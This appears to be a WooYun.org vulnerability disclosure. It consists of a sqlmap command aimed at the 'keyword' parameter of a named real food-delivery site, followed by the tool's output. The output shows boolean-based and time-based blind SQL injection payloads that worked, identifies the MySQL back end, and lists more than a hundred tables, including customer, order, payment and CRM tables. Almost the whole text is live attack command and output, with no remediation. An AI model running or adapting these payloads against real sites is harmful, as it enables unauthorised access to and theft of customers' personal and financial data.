WooYun.org

C:\Users\Administrator>sqlmap.py -u "www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091" -p keyword --tables

sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=0%' AND 7994=7994 AND '%'='&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: keyword=0%' AND SLEEP(5) AND '%'='&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0.11
Database: website
[104 tables]
+---------------------------------------+
| C3P0TestTable                         |
| a_lim_table1                          |
| a_lim_table1_14_26                    |
| a_table_cyk_all                       |
| a_table_sup                           |
| crm_address                           |
| crm_admin_operate_log                 |
| crm_after_sale                        |
| crm_b2bsups                           |
| crm_blacklist                         |
| crm_customer_service                  |
| crm_customer_service_status           |
| crm_gps_gprs_message                  |
| crm_gps_gprs_order                    |
| crm_gps_gprs_order_bak                |
| crm_mobile_city                       |
| crm_operation_log                     |
| crm_operation_log_bak                 |
| crm_operators                         |
| crm_order_his                         |
| crm_order_his_all                     |
| crm_peisong                           |
| crm_peisong_bak                       |
| crm_peisong_paiban                    |
| crm_peisongtuan                       |
| crm_peisongtuan_bak                   |
| crm_phone                             |
| crm_system_parameters                 |
| crm_viplist                           |
| crm_youhui_phone                      |
| g_building                            |
| g_item                                |
| g_item_type                           |
| g_market                              |
| g_queue_time                          |
| gps_whereru                           |
| w_coupon                              |
| w_coupon_user                         |
| wm_address                            |
| wm_address_express                    |
| wm_app_message                        |
| wm_app_message_copy                   |
| wm_app_message_copy1                  |
| wm_app_phoneid                        |
| wm_app_tuisong                        |
| wm_bbs_rating_integral                |
| wm_bbs_rating_level                   |
| wm_bbs_rating_type                    |
| wm_gorder                             |
| wm_gprs_printers                      |
| wm_gprsprint_order                    |
| wm_gprsprint_phoneno                  |
| wm_group                              |
| wm_group_department                   |
| wm_group_member                       |
| wm_group_operation_log                |
| wm_images_sup                         |
| wm_integral                           |
| wm_ipforward                          |
| wm_joincity                           |
| wm_kuaike_member                      |
| wm_liansuo                            |
| wm_market_cj                          |
| wm_market_liansuo                     |
| wm_market_mail                        |
| wm_market_product                     |
| wm_market_product_prop                |
| wm_market_property                    |
| wm_market_provider                    |
| wm_market_type                        |
| wm_market_type2                       |
| wm_member                             |
| wm_member_consume                     |
| wm_member_day                         |
| wm_menu                               |
| wm_menu_class                         |
| wm_microblog_main                     |
| wm_microblog_reply                    |
| wm_money_application                  |
| wm_money_jftomoney                    |
| wm_money_record                       |
| wm_moneyuse_log                       |
| wm_notice                             |
| wm_order                              |
| wm_order_detail                       |
| wm_order_his                          |
| wm_order_id                           |
| wm_order_wcps20140209                 |
| wm_pack_dic                           |
| wm_package_menu                       |
| wm_package_rule                       |
| wm_package_submenu                    |
| wm_pay_log                            |
| wm_prize                              |
| wm_prize_record                       |
| wm_shop_class                         |
| wm_sixin                              |
| wm_sixin_read                         |
| wm_sup_info                           |
| wm_supclass                           |
| wm_supplier                           |
| wm_supplier_favorite                  |
| wm_wuliu                              |
| wm_youhui                             |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+